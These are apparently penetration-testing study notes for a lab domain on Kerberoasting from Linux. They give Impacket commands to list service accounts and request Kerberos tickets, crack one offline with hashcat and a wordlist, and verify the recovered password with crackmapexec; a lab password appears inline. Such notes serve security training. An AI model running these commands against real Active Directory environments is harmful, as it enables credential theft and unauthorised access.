Kerberoasting - From Linux

<aside> 💡

A prerequisite to performing Kerberoasting attacks is either domain user credentials (cleartext or just an NTLM hash if using Impacket), a shell in the context of a domain user, or account such as SYSTEM. Once we have this level of access, we can start. We must also know which host in the domain is a Domain Controller so we can query it

</aside>

GetUserSPNs.py

# Installing Tools
git clone <https://github.com/SecureAuthCorp/impacket>
sudo python3 -m pip install .

GetUserSPNs.py -h

# Listing SPN Accounts
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend  Klmcargo2

# Requesting all TGS Tickets
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request 

# Requesting a Single TGS ticket
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev

# Saving the TGS Ticket to an Output File
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev -outputfile sqldev_tgs

# Cracking the Ticket Offline with Hashcat
hashcat -m 13100 sqldev_tgs /usr/share/wordlists/rockyou.txt 

# Testing Authentication against a Domain Controller
sudo crackmapexec smb 172.16.5.5 -u sqldev -p database!